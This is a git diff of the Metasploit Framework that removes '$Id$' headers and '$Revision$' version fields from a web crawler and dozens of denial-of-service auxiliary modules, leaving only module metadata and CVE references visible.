@@ #!/usr/bin/env ruby # -# $Id$ -# # Web Crawler. # # Author: Efrain Torres et [at] metasploit.com 2010 @@ -24,7 +22,6 @@ class Metasploit3 < Msf::Auxiliary def initialize(info = {}) super(update_info(info, 'Name' => 'Metasploit Web Crawler', - 'Version' => '$Revision$', 'Description' => 'This auxiliary module is a modular web crawler, to be used in conjuntion with wmap (someday) or standalone.', 'Author' => 'et', 'License' => MSF_LICENSE diff --git a/modules/auxiliary/dos/cisco/ios_http_percentpercent.rb b/modules/auxiliary/dos/cisco/ios_http_percentpercent.rb index 69ae191564..0cd7018408 100644 --- a/modules/auxiliary/dos/cisco/ios_http_percentpercent.rb +++ b/modules/auxiliary/dos/cisco/ios_http_percentpercent.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -29,7 +25,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'Patrick Webster ' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'BID', '1154'], diff --git a/modules/auxiliary/dos/dhcp/isc_dhcpd_clientid.rb b/modules/auxiliary/dos/dhcp/isc_dhcpd_clientid.rb index c1645d52e9..2c9f2a6e3a 100644 --- a/modules/auxiliary/dos/dhcp/isc_dhcpd_clientid.rb +++ b/modules/auxiliary/dos/dhcp/isc_dhcpd_clientid.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -32,7 +28,6 @@ class Metasploit3 < Msf::Auxiliary 'theLightCosine' # msf module ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2010-2156' ], diff --git a/modules/auxiliary/dos/freebsd/nfsd/nfsd_mount.rb b/modules/auxiliary/dos/freebsd/nfsd/nfsd_mount.rb index 5953a2c72e..7773413212 100644 --- a/modules/auxiliary/dos/freebsd/nfsd/nfsd_mount.rb +++ b/modules/auxiliary/dos/freebsd/nfsd/nfsd_mount.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'URL', 'http://lists.immunitysec.com/pipermail/dailydave/2006-February/002982.html' ], diff --git a/modules/auxiliary/dos/hp/data_protector_rds.rb b/modules/auxiliary/dos/hp/data_protector_rds.rb index f4f9ec8c43..1bfed3692f 100644 --- a/modules/auxiliary/dos/hp/data_protector_rds.rb +++ b/modules/auxiliary/dos/hp/data_protector_rds.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -31,7 +27,6 @@ class Metasploit3 < Msf::Auxiliary 'sinn3r', #msf ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2011-0514' ], diff --git a/modules/auxiliary/dos/http/3com_superstack_switch.rb b/modules/auxiliary/dos/http/3com_superstack_switch.rb index f9d95c1827..52706a9880 100644 --- a/modules/auxiliary/dos/http/3com_superstack_switch.rb +++ b/modules/auxiliary/dos/http/3com_superstack_switch.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -31,7 +27,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'patrick' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ # patrickw - I am not sure if these are correct, but the closest match! diff --git a/modules/auxiliary/dos/http/apache_mod_isapi.rb b/modules/auxiliary/dos/http/apache_mod_isapi.rb index c60138353b..04ef0fa8f7 100644 --- a/modules/auxiliary/dos/http/apache_mod_isapi.rb +++ b/modules/auxiliary/dos/http/apache_mod_isapi.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -43,7 +39,6 @@ class Metasploit3 < Msf::Auxiliary 'Brett Gervasoni', # original discovery 'jduck' ], - 'Version' => '$Revision$', 'License' => MSF_LICENSE, 'References' => [ diff --git a/modules/auxiliary/dos/http/apache_range_dos.rb b/modules/auxiliary/dos/http/apache_range_dos.rb index 41f75be28a..1cab306c3e 100644 --- a/modules/auxiliary/dos/http/apache_range_dos.rb +++ b/modules/auxiliary/dos/http/apache_range_dos.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -31,7 +27,6 @@ class Metasploit3 < Msf::Auxiliary 'Masashi Fujiwara' #metasploit module ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'BID', '49303'], diff --git a/modules/auxiliary/dos/http/apache_tomcat_transfer_encoding.rb b/modules/auxiliary/dos/http/apache_tomcat_transfer_encoding.rb index 02e1c7cc9b..8d549514a7 100644 --- a/modules/auxiliary/dos/http/apache_tomcat_transfer_encoding.rb +++ b/modules/auxiliary/dos/http/apache_tomcat_transfer_encoding.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -32,7 +28,6 @@ class Metasploit3 < Msf::Auxiliary 'Paulino Calderon ', #metasploit module ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2010-2227' ], diff --git a/modules/auxiliary/dos/http/dell_openmanage_post.rb b/modules/auxiliary/dos/http/dell_openmanage_post.rb index bebba2d291..ccb871e447 100644 --- a/modules/auxiliary/dos/http/dell_openmanage_post.rb +++ b/modules/auxiliary/dos/http/dell_openmanage_post.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -31,7 +27,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'patrick' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'URL', 'http://archives.neohapsis.com/archives/bugtraq/2004-02/0650.html' ], diff --git a/modules/auxiliary/dos/http/hashcollision_dos.rb b/modules/auxiliary/dos/http/hashcollision_dos.rb index bccf0704c9..d92c36f73b 100644 --- a/modules/auxiliary/dos/http/hashcollision_dos.rb +++ b/modules/auxiliary/dos/http/hashcollision_dos.rb @@ -36,7 +36,6 @@ class Metasploit3 < Msf::Auxiliary 'Christian Mehlmauer ' # metasploit module ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['URL', 'http://www.ocert.org/advisories/ocert-2011-003.html'], diff --git a/modules/auxiliary/dos/http/sonicwall_ssl_format.rb b/modules/auxiliary/dos/http/sonicwall_ssl_format.rb index 7cbe47c42a..a18b172987 100644 --- a/modules/auxiliary/dos/http/sonicwall_ssl_format.rb +++ b/modules/auxiliary/dos/http/sonicwall_ssl_format.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -29,7 +25,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'patrick' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'BID', '35145' ], #[ 'CVE', '' ], # no CVE? diff --git a/modules/auxiliary/dos/http/webrick_regex.rb b/modules/auxiliary/dos/http/webrick_regex.rb index bbd0cd3fc8..34f83072e2 100644 --- a/modules/auxiliary/dos/http/webrick_regex.rb +++ b/modules/auxiliary/dos/http/webrick_regex.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => 'kris katterjohn', 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'BID', '30644'], [ 'CVE', '2008-3656'], diff --git a/modules/auxiliary/dos/mdns/avahi_portzero.rb b/modules/auxiliary/dos/mdns/avahi_portzero.rb index 6c3ad96ca0..ec0d44cce2 100644 --- a/modules/auxiliary/dos/mdns/avahi_portzero.rb +++ b/modules/auxiliary/dos/mdns/avahi_portzero.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -25,7 +21,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => 'kris katterjohn', 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-5081' ], [ 'OSVDB', '50929' ], diff --git a/modules/auxiliary/dos/ntp/ntpd_reserved_dos.rb b/modules/auxiliary/dos/ntp/ntpd_reserved_dos.rb index a15751b505..fc606c9845 100644 --- a/modules/auxiliary/dos/ntp/ntpd_reserved_dos.rb +++ b/modules/auxiliary/dos/ntp/ntpd_reserved_dos.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -31,7 +27,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'todb' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'BID', '37255' ], diff --git a/modules/auxiliary/dos/pptp/ms02_063_pptp_dos.rb b/modules/auxiliary/dos/pptp/ms02_063_pptp_dos.rb index c45bc2aa67..d50494af30 100644 --- a/modules/auxiliary/dos/pptp/ms02_063_pptp_dos.rb +++ b/modules/auxiliary/dos/pptp/ms02_063_pptp_dos.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -28,7 +24,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'patrick' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'BID', '5807' ], diff --git a/modules/auxiliary/dos/samba/lsa_addprivs_heap.rb b/modules/auxiliary/dos/samba/lsa_addprivs_heap.rb index da40a73201..0bc8a9cedd 100644 --- a/modules/auxiliary/dos/samba/lsa_addprivs_heap.rb +++ b/modules/auxiliary/dos/samba/lsa_addprivs_heap.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -28,7 +24,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['CVE', '2007-2446'], diff --git a/modules/auxiliary/dos/samba/lsa_transnames_heap.rb b/modules/auxiliary/dos/samba/lsa_transnames_heap.rb index 6c6419d06b..ab69b99576 100644 --- a/modules/auxiliary/dos/samba/lsa_transnames_heap.rb +++ b/modules/auxiliary/dos/samba/lsa_transnames_heap.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -28,7 +24,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['CVE', '2007-2446'], diff --git a/modules/auxiliary/dos/scada/beckhoff_twincat.rb b/modules/auxiliary/dos/scada/beckhoff_twincat.rb index 66ac112ce2..787f7a6140 100644 --- a/modules/auxiliary/dos/scada/beckhoff_twincat.rb +++ b/modules/auxiliary/dos/scada/beckhoff_twincat.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -29,7 +25,6 @@ class Metasploit3 < Msf::Auxiliary 'jfa', # Metasploit module ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2011-3486' ], diff --git a/modules/auxiliary/dos/scada/d20_tftp_overflow.rb b/modules/auxiliary/dos/scada/d20_tftp_overflow.rb index 99a01258a8..381a4dda6f 100644 --- a/modules/auxiliary/dos/scada/d20_tftp_overflow.rb +++ b/modules/auxiliary/dos/scada/d20_tftp_overflow.rb @@ -43,7 +43,6 @@ class Metasploit3 < Msf::Auxiliary [ [ 'URL', 'http://www.digitalbond.com/tools/basecamp/metasploit-modules/' ] ], - 'Version' => '$Revision$', 'DisclosureDate' => 'Jan 19 2012' )) diff --git a/modules/auxiliary/dos/smtp/sendmail_prescan.rb b/modules/auxiliary/dos/smtp/sendmail_prescan.rb index 8e7407779d..f0eddba31c 100644 --- a/modules/auxiliary/dos/smtp/sendmail_prescan.rb +++ b/modules/auxiliary/dos/smtp/sendmail_prescan.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ class Metasploit3 < Msf::Auxiliary bytes can be used, limiting the likelihood for arbitrary code execution. }, 'Author' => [ 'patrick' ], - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '2577' ], diff --git a/modules/auxiliary/dos/solaris/lpd/cascade_delete.rb b/modules/auxiliary/dos/solaris/lpd/cascade_delete.rb index 64d689a126..e03ac458d7 100644 --- a/modules/auxiliary/dos/solaris/lpd/cascade_delete.rb +++ b/modules/auxiliary/dos/solaris/lpd/cascade_delete.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -31,7 +27,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'hdm', 'Optyx ' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2005-4797' ], diff --git a/modules/auxiliary/dos/ssl/dtls_changecipherspec.rb b/modules/auxiliary/dos/ssl/dtls_changecipherspec.rb index 65cfc1d43d..58df110d2b 100644 --- a/modules/auxiliary/dos/ssl/dtls_changecipherspec.rb +++ b/modules/auxiliary/dos/ssl/dtls_changecipherspec.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -31,7 +27,6 @@ class Metasploit3 < Msf::Auxiliary 'theLightCosine' # metasploit module ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-1386' ], diff --git a/modules/auxiliary/dos/syslog/rsyslog_long_tag.rb b/modules/auxiliary/dos/syslog/rsyslog_long_tag.rb index 41dedf777d..b3aad945a1 100644 --- a/modules/auxiliary/dos/syslog/rsyslog_long_tag.rb +++ b/modules/auxiliary/dos/syslog/rsyslog_long_tag.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -29,7 +25,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => 'hdm', 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2011-3200'], diff --git a/modules/auxiliary/dos/tcp/junos_tcp_opt.rb b/modules/auxiliary/dos/tcp/junos_tcp_opt.rb index 957b1d76e4..8d7291337c 100644 --- a/modules/auxiliary/dos/tcp/junos_tcp_opt.rb +++ b/modules/auxiliary/dos/tcp/junos_tcp_opt.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -34,8 +30,7 @@ class Metasploit3 < Msf::Auxiliary ['BID', '37670'], ['OSVDB', '61538'], ['URL','http://praetorianprefect.com/archives/2010/01/junos-juniper-flaw-exposes-core-routers-to-kernal-crash/'] - ], - 'Version' => '$Revision$' # 02/02/2010 + ] ) register_options([ diff --git a/modules/auxiliary/dos/tcp/synflood.rb b/modules/auxiliary/dos/tcp/synflood.rb index 66594d6bcc..66b5a47282 100644 --- a/modules/auxiliary/dos/tcp/synflood.rb +++ b/modules/auxiliary/dos/tcp/synflood.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -21,8 +17,7 @@ class Metasploit3 < Msf::Auxiliary 'Name' => 'TCP SYN Flooder', 'Description' => 'A simple TCP SYN flooder', 'Author' => 'kris katterjohn', - 'License' => MSF_LICENSE, - 'Version' => '$Revision$' # 03/13/2009 + 'License' => MSF_LICENSE ) register_options([ diff --git a/modules/auxiliary/dos/wifi/apple_orinoco_probe_response.rb b/modules/auxiliary/dos/wifi/apple_orinoco_probe_response.rb index 2cf0c4313f..67a5ae6ee1 100644 --- a/modules/auxiliary/dos/wifi/apple_orinoco_probe_response.rb +++ b/modules/auxiliary/dos/wifi/apple_orinoco_probe_response.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -37,8 +33,7 @@ class Metasploit3 < Msf::Auxiliary [ ['CVE', '2006-5710'], ['OSVDB', '30180'], - ], - 'Version' => '$Revision$' + ] )) register_options( [ diff --git a/modules/auxiliary/dos/wifi/cts_rts_flood.rb b/modules/auxiliary/dos/wifi/cts_rts_flood.rb index 6c058fb8c4..259c8cee7b 100644 --- a/modules/auxiliary/dos/wifi/cts_rts_flood.rb +++ b/modules/auxiliary/dos/wifi/cts_rts_flood.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -24,8 +20,7 @@ class Metasploit3 < Msf::Auxiliary using the specified source address, }, 'Author' => [ 'Brad Antoniewicz' ], - 'License' => MSF_LICENSE, - 'Version' => '$Revision$' + 'License' => MSF_LICENSE )) register_options( diff --git a/modules/auxiliary/dos/wifi/deauth.rb b/modules/auxiliary/dos/wifi/deauth.rb index 283fb2f78c..e8eff6f2c6 100644 --- a/modules/auxiliary/dos/wifi/deauth.rb +++ b/modules/auxiliary/dos/wifi/deauth.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -25,8 +21,7 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'Brad Antoniewicz' ], - 'License' => MSF_LICENSE, - 'Version' => '$Revision$' + 'License' => MSF_LICENSE )) register_options( diff --git a/modules/auxiliary/dos/wifi/fakeap.rb b/modules/auxiliary/dos/wifi/fakeap.rb index 9658cbdd1d..11cc5780a7 100644 --- a/modules/auxiliary/dos/wifi/fakeap.rb +++ b/modules/auxiliary/dos/wifi/fakeap.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -29,8 +25,7 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'hdm', 'kris katterjohn' ], - 'License' => MSF_LICENSE, - 'Version' => '$Revision$' + 'License' => MSF_LICENSE )) register_options([ diff --git a/modules/auxiliary/dos/wifi/file2air.rb b/modules/auxiliary/dos/wifi/file2air.rb index aa2bdd1008..d37be665ea 100644 --- a/modules/auxiliary/dos/wifi/file2air.rb +++ b/modules/auxiliary/dos/wifi/file2air.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -29,8 +25,7 @@ class Metasploit3 < Msf::Auxiliary }, # 11/03/2008 'Author' => 'kris katterjohn', - 'License' => MSF_LICENSE, - 'Version' => '$Revision$' + 'License' => MSF_LICENSE )) register_options([ diff --git a/modules/auxiliary/dos/wifi/netgear_ma521_rates.rb b/modules/auxiliary/dos/wifi/netgear_ma521_rates.rb index 1deaf5eecc..73dea9fbe5 100644 --- a/modules/auxiliary/dos/wifi/netgear_ma521_rates.rb +++ b/modules/auxiliary/dos/wifi/netgear_ma521_rates.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -34,7 +30,6 @@ class Metasploit3 < Msf::Auxiliary (external/ruby-lorcon/README) for more information. }, 'Author' => [ 'Laurent Butti <0x9090 [at] gmail.com>' ], # initial discovery and metasploit module - 'Version' => '$Revision$', 'License' => MSF_LICENSE, 'References' => [ diff --git a/modules/auxiliary/dos/wifi/netgear_wg311pci.rb b/modules/auxiliary/dos/wifi/netgear_wg311pci.rb index a4c3028e9f..c46e0aee08 100644 --- a/modules/auxiliary/dos/wifi/netgear_wg311pci.rb +++ b/modules/auxiliary/dos/wifi/netgear_wg311pci.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -32,7 +28,6 @@ class Metasploit3 < Msf::Auxiliary (external/ruby-lorcon/README) for more information. }, 'Author' => [ 'Laurent Butti <0x9090 [at] gmail.com>' ], # initial discovery and metasploit module - 'Version' => '$Revision$', 'License' => MSF_LICENSE, 'References' => [ diff --git a/modules/auxiliary/dos/wifi/probe_resp_null_ssid.rb b/modules/auxiliary/dos/wifi/probe_resp_null_ssid.rb index aadf4ad003..4680e449e0 100644 --- a/modules/auxiliary/dos/wifi/probe_resp_null_ssid.rb +++ b/modules/auxiliary/dos/wifi/probe_resp_null_ssid.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -31,7 +27,6 @@ class Metasploit3 < Msf::Auxiliary 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['URL', 'http://802.11ninja.net/papers/firmware_attack.pdf'], diff --git a/modules/auxiliary/dos/wifi/ssidlist_beacon.rb b/modules/auxiliary/dos/wifi/ssidlist_beacon.rb index 6d00b6e210..74991ba58b 100644 --- a/modules/auxiliary/dos/wifi/ssidlist_beacon.rb +++ b/modules/auxiliary/dos/wifi/ssidlist_beacon.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -33,8 +29,7 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'joswr1ght', 'hdm' ], - 'License' => MSF_LICENSE, - 'Version' => '$Revision$' + 'License' => MSF_LICENSE )) register_options( [ diff --git a/modules/auxiliary/dos/wifi/wifun.rb b/modules/auxiliary/dos/wifi/wifun.rb index 350cef40f5..f0dca7ada4 100644 --- a/modules/auxiliary/dos/wifi/wifun.rb +++ b/modules/auxiliary/dos/wifi/wifun.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,8 +23,7 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'hdm' ], - 'License' => MSF_LICENSE, - 'Version' => '$Revision$' + 'License' => MSF_LICENSE )) end diff --git a/modules/auxiliary/dos/windows/appian/appian_bpm.rb b/modules/auxiliary/dos/windows/appian/appian_bpm.rb index 382f56db4f..80d9656c34 100644 --- a/modules/auxiliary/dos/windows/appian/appian_bpm.rb +++ b/modules/auxiliary/dos/windows/appian/appian_bpm.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -28,7 +24,6 @@ class Metasploit3 < Msf::Auxiliary 'Author' => [ 'guiness.stout ' ], 'License' => BSD_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['CVE', '2007-6509'], diff --git a/modules/auxiliary/dos/windows/browser/ms09_065_eot_integer.rb b/modules/auxiliary/dos/windows/browser/ms09_065_eot_integer.rb index 035163abec..de82b21fb9 100644 --- a/modules/auxiliary/dos/windows/browser/ms09_065_eot_integer.rb +++ b/modules/auxiliary/dos/windows/browser/ms09_065_eot_integer.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -28,7 +24,6 @@ class Metasploit3 < Msf::Auxiliary }, 'License' => MSF_LICENSE, 'Author' => 'hdm', - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-2514' ], diff --git a/modules/auxiliary/dos/windows/ftp/filezilla_admin_user.rb b/modules/auxiliary/dos/windows/ftp/filezilla_admin_user.rb index 75ba28552e..7c1e44ab82 100644 --- a/modules/auxiliary/dos/windows/ftp/filezilla_admin_user.rb +++ b/modules/auxiliary/dos/windows/ftp/filezilla_admin_user.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -30,7 +26,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'patrick' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'BID', '15346' ], diff --git a/modules/auxiliary/dos/windows/ftp/filezilla_server_port.rb b/modules/auxiliary/dos/windows/ftp/filezilla_server_port.rb index f4ffbb1c95..980e67397f 100644 --- a/modules/auxiliary/dos/windows/ftp/filezilla_server_port.rb +++ b/modules/auxiliary/dos/windows/ftp/filezilla_server_port.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'patrick' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'BID', '21542' ], diff --git a/modules/auxiliary/dos/windows/ftp/guildftp_cwdlist.rb b/modules/auxiliary/dos/windows/ftp/guildftp_cwdlist.rb index a22fbf5b85..557d391470 100644 --- a/modules/auxiliary/dos/windows/ftp/guildftp_cwdlist.rb +++ b/modules/auxiliary/dos/windows/ftp/guildftp_cwdlist.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,7 +22,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => 'kris katterjohn', 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-4572' ], diff --git a/modules/auxiliary/dos/windows/ftp/iis75_ftpd_iac_bof.rb b/modules/auxiliary/dos/windows/ftp/iis75_ftpd_iac_bof.rb index 0a76c4ad62..4b88ce4fbf 100644 --- a/modules/auxiliary/dos/windows/ftp/iis75_ftpd_iac_bof.rb +++ b/modules/auxiliary/dos/windows/ftp/iis75_ftpd_iac_bof.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -33,7 +29,6 @@ class Metasploit3 < Msf::Auxiliary 'jduck' # Metasploit module ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2010-3972' ], diff --git a/modules/auxiliary/dos/windows/ftp/solarftp_user.rb b/modules/auxiliary/dos/windows/ftp/solarftp_user.rb index 7e4f8f1b6f..88be5f2f0f 100644 --- a/modules/auxiliary/dos/windows/ftp/solarftp_user.rb +++ b/modules/auxiliary/dos/windows/ftp/solarftp_user.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -31,7 +27,6 @@ class Metasploit3 < Msf::Auxiliary 'sinn3r', #Metasploit edit/commit ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'EDB', '16204' ], diff --git a/modules/auxiliary/dos/windows/ftp/titan626_site.rb b/modules/auxiliary/dos/windows/ftp/titan626_site.rb index 76f363880f..62388c5d55 100644 --- a/modules/auxiliary/dos/windows/ftp/titan626_site.rb +++ b/modules/auxiliary/dos/windows/ftp/titan626_site.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,7 +22,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => 'kris katterjohn', 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-6082'], diff --git a/modules/auxiliary/dos/windows/ftp/vicftps50_list.rb b/modules/auxiliary/dos/windows/ftp/vicftps50_list.rb index 0df99d2953..890ad99235 100644 --- a/modules/auxiliary/dos/windows/ftp/vicftps50_list.rb +++ b/modules/auxiliary/dos/windows/ftp/vicftps50_list.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -25,7 +21,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => 'kris katterjohn', 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-2031' ], diff --git a/modules/auxiliary/dos/windows/ftp/winftp230_nlst.rb b/modules/auxiliary/dos/windows/ftp/winftp230_nlst.rb index 9c3eca5167..5c566c34e7 100644 --- a/modules/auxiliary/dos/windows/ftp/winftp230_nlst.rb +++ b/modules/auxiliary/dos/windows/ftp/winftp230_nlst.rb @@ -1,7 +1,3 @@ -## -# $Id$ 